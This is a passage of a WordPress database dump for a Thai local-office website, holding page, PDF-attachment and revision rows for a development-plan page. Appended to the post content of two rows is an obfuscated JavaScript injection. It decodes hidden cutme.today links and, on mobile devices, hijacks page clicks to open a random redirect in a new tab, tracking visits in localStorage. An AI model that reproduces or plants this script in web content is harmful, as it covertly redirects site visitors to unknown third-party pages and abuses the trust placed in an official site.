\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน','','publish','closed','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%a2%e0%b8%b8%e0%b8%97%e0%b8%98%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c%e0%b8%ab%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1','','','2024-08-09 11:56:53','2024-08-09 04:56:53','',0,'http://pakhaeng.ssk.in.th/?page_id=780',0,'page','',0),
(781,1,'2024-08-09 11:56:47','2024-08-09 04:56:47','','07แผนพัฒนาหน่วยงาน','','inherit','','closed','','07%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%ab%e0%b8%99%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99','','','2024-08-09 11:56:47','2024-08-09 04:56:47','',780,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf',0,'attachment','application/pdf',0),
(782,1,'2024-08-09 11:56:52','2024-08-09 04:56:52','<!-- wp:file {\"id\":781,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"07แผนพัฒนาหน่วยงาน\"></object><a id=\"wp-block-file--media-3a6ea529-fde8-4f0f-b9f9-3047c0b479c8\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf\">07แผนพัฒนาหน่วยงาน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-3a6ea529-fde8-4f0f-b9f9-3047c0b479c8\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน','','inherit','closed','closed','','780-revision-v1','','','2024-08-09 11:56:52','2024-08-09 04:56:52','',780,'http://pakhaeng.ssk.in.th/?p=782',0,'revision','',0),
(783,1,'2024-08-09 11:57:05','2024-08-09 04:57:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 